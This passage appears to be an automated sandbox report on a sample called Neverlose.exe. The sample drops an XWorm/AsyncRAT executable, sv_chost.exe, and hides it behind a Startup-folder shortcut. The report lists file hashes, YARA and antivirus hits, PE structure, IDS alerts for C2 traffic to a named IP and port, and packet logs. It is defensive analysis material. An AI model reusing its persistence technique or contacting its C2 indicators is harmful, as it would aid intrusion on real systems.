                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxudvfyb.dt1.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdhxszdj.lfr.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw2xekrp.0z0.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tblfnh2b.ehz.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzoztzcb.cpt.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_viph2qoc.n3i.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zig5gpiv.hlq.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 24 18:56:25 2024, mtime=Sat Aug 24 18:56:25 2024, atime=Sat Aug 24 18:56:25 2024, length=84480, window=hide
                                                              Category:dropped
                                                              Size (bytes):771
                                                              Entropy (8bit):5.087787805776581
                                                              Encrypted:false
                                                              SSDEEP:12:86656/l/si4GvgWCyB8dY//H+wl/y9dL30D/DjA3mrHmNeDEw8XBmV:8Rk/l/CGvLu+js9p30D/AWQeYw8XBm
                                                              MD5:7DA92340652284F276C4CC04ACE799B4
                                                              SHA1:5B2BFA0400C5A540C0A4AE0AB4FE9B2910115CC2
                                                              SHA-256:2A36B49CC3D5F57E861C8AA1DE4973D44FBE8460BA138622A9CDD7DDD3FD746B
                                                              SHA-512:7E7CB1599EBE7373476FDA94751856C8E654BACE9000AB79BC87FA463E2A5ED4E0BA0B38B8895449D3EBE50488DDBB405BC4AD9E8A77299F0FAE804746AFC090
                                                              Malicious:false
                                                              Preview:L..................F.... ...P._...P._...P._....J......................z.:..DG..Yr?.D..U..k0.&...&......vk.v....gC.y_...b..._.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y............................6..R.o.a.m.i.n.g.....f.2..J...Y.. .sv_chost.exe..J.......Y...Y............................(2.s.v._.c.h.o.s.t...e.x.e.......Z...............-.......Y....................C:\Users\user\AppData\Roaming\sv_chost.exe........\.....\.....\.....\.....\.s.v._.c.h.o.s.t...e.x.e.`.......X.......123991...........hT..CrF.f4... .$...Rb...,.......hT..CrF.f4... .$...Rb...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                              C:\Users\user\AppData\Roaming\sv_chost.exe

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):84480
                                                              Entropy (8bit):5.979998885001342
                                                              Encrypted:false
                                                              SSDEEP:1536:RGz2iTckU6TRXXUMCxA1M+bIJqqKHzIlt28A6EVbSOo9y+:cysO6THM+bIJaAQ84bSOos+
                                                              MD5:8AC3D32DDD136180B75C36A39398F39F
                                                              SHA1:D3F37C1CF6DEA9C9F1A17D2D3E2788CB71D13502
                                                              SHA-256:645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                                                              SHA-512:0174DF5E68D0EBCC9E736D5574F02C622C108DD16C097DC6D1DD4D61134B0BAC775C63A70D0AA739085E31F5DDC75DD7F51CD9A938C15EAC09F7278BFC1CC283
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                              Joe Sandbox View:
                                                              • Filename: Solara.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................@..........N_... ...`....@.. ....................................@..................................^..W....`............................................................................... ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................0_......H....... `..........&.....................................................(....*.r...p*. ....*..(....*.r5..p*. q.%.*.s.........s.........s.........s.........*.r...p*. *p{.*.rg..p*. _..*.r...p*. C.?.*.rz..p*. .j..*.r...p*. ..].*..((...*.r<..p*.r...p*. ^p..*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. ....*.rp..p*. .`..*.r...p*. .=T.*.rd..p*. .j..*.r...p*. I.;.*.rX..p*. ....*..............j..................s]..............~.........*

                                                              \Device\ConDrv

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):1776
                                                              Entropy (8bit):3.5480492848009324
                                                              Encrypted:false
                                                              SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEcfyNodeI5nFC3udee:6s/Xv6zklC3aEoy+de2C3udee
                                                              MD5:7264ED58A430BF80CED4FE4977A81ABE
                                                              SHA1:AC73A7FC9C993F27494651FD56FC9289F5C54F03
                                                              SHA-256:3BECF43647028907B5DF24E41012AD21AD4CBFC3DC639C73BA7219B5241EE269
                                                              SHA-512:688723E77658A9032D807BF8FBA514B246EA2B7A9E371BA1F6C7DF2BAF4DBA831AED5586CA149AE29C85427EF1592238E9516BD309D47B328D65D73D75DF9C33
                                                              Malicious:false
                                                              Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.989223506654496
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.94%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Neverlose.exe
                                                              File size:1'189'376 bytes
                                                              MD5:39d6ec26690ffee2e74fb9694b30453c
                                                              SHA1:85a689c84e3a6584ed2cfca6da05c54a7ebfeb18
                                                              SHA256:4bf2d648bf901a9c4f26b43f85e26b6659e22657a3d308dea668de43fed2dfdb
                                                              SHA512:184347e37d40f14b210dc5838b0894dcacd746a7af8e68846ebe0ab7794e5c8a24b8d3a2d276c8a06901fbab3fd13f8bca8da37617ecab198c75232d7aee086e
                                                              SSDEEP:24576:dqwa7YmN2K1EFitGs4/ak66Z9c801j5F/:dF5mNl1YMPJ+9cF1jD/
                                                              TLSH:AB45331392D52804CCBE727473EFE71FB2AB21B7AAF7880DBE959D56680409BE444DC4
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................m.... ........@.. ........................7...........@................................

                                                              File Icon

                                                              Icon Hash:90cececece8e8eb0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x41036d
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66C6DD90 [Thu Aug 22 06:41:20 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:2e5467cba76f44a088d39f78c5e807b6

                                                              Entrypoint Preview

                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              add esp, FFFFFFF0h
                                                              mov eax, 00401000h
                                                              call 00007FE5C13D0AB6h
                                                              call far 5DE5h : 8B10C483h
                                                              jmp 00007FE5C173D1F8h
                                                              cwde
                                                              aas
                                                              aam 95h
                                                              push 00000056h
                                                              mov cl, 42h
                                                              and dword ptr [ecx-0E27C25Ch], 53h
                                                              dec ecx
                                                              mov edx, 93464AD7h
                                                              fld qword ptr [esi-2E888BF0h]
                                                              clc
                                                              nop
                                                              inc edi
                                                              inc ebp
                                                              aam 0Fh
                                                              jnp 00007FE5C13D0A53h
                                                              enter E84Eh, 2Dh
                                                              pushfd
                                                              or eax, 9FA99F8Ah
                                                              xchg eax, edi
                                                              jns 00007FE5C13D0AB1h
                                                              cmp cl, byte ptr [ecx-47h]
                                                              inc edi
                                                              bound edx, dword ptr [eax-66842CCAh]
                                                              jp 00007FE5C13D0AC8h

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2980200x210.data
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x4c8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2980000xc.data
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              0x20000x100000x10000504cb1489c19fe6633182dcc42d75212False1.000396728515625data7.99709234138958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              0x120000x20000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              0x140000x20000x200870484c1f4c6c68a73a5f22669fa6139False1.021484375data7.501912508388803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x160000x20000x6009b7d62c0a77ff5b5b7a702703957c42fFalse0.3723958333333333data3.6952548279889683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              0x180000x2800000x2ba000173ee7ae3ccefb5a6378710b351ecc3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .data0x2980000xe60000xe600026e6bac610bd6b2ebc38659cb3de9db9False0.9972337805706522data7.984098571143187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x160a00x23cdata0.4755244755244755
                                                              RT_MANIFEST0x162dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                              Imports

                                                              DLLImport
                                                              kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                              user32.dllMessageBoxA
                                                              advapi32.dllRegCloseKey
                                                              oleaut32.dllSysFreeString
                                                              gdi32.dllCreateFontA
                                                              shell32.dllShellExecuteA
                                                              version.dllGetFileVersionInfoA
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                              2024-08-24T21:55:06.804547+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349732443192.168.2.4140.82.121.4
                                                              2024-08-24T21:57:03.276679+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound14974114520192.168.2.4147.185.221.22

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 24, 2024 21:55:03.960525990 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:03.960555077 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:03.960773945 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:03.976320982 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:03.976341009 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:04.636399984 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:04.636464119 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:04.640326977 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:04.640338898 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:04.640662909 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:04.681404114 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:04.698662043 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:04.744493008 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057477951 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057554007 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057598114 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.057611942 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057775021 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057822943 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.057830095 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.057871103 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.058079004 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.058130026 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.058154106 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.058162928 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.058168888 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.058206081 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.058212996 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.101633072 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.154200077 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154301882 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154331923 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154386997 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.154405117 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154448032 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.154459000 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154570103 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.154606104 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.154612064 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155478954 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155533075 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155560970 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155582905 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.155596018 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155611992 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.155632973 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.155677080 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.155683041 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156320095 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156384945 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.156392097 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156523943 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156563044 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156567097 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.156573057 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.156621933 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.157195091 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.157334089 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.157382011 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.157388926 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.212667942 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.240029097 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244323969 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244390011 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244400024 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.244410992 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244453907 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.244467020 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244570971 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244612932 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244628906 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.244635105 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244709969 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244755983 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.244762897 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.244806051 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.245332956 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245402098 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245479107 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.245485067 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245543003 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245577097 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245611906 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245620012 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.245626926 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.245665073 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.246304989 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246397018 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.246398926 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246412039 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246450901 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.246460915 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246517897 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246572018 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246606112 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.246612072 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.246666908 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.247303009 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247360945 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247406960 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.247416019 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247458935 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247493982 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247498989 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.247505903 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.247548103 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.247554064 CEST44349730140.82.121.4192.168.2.4
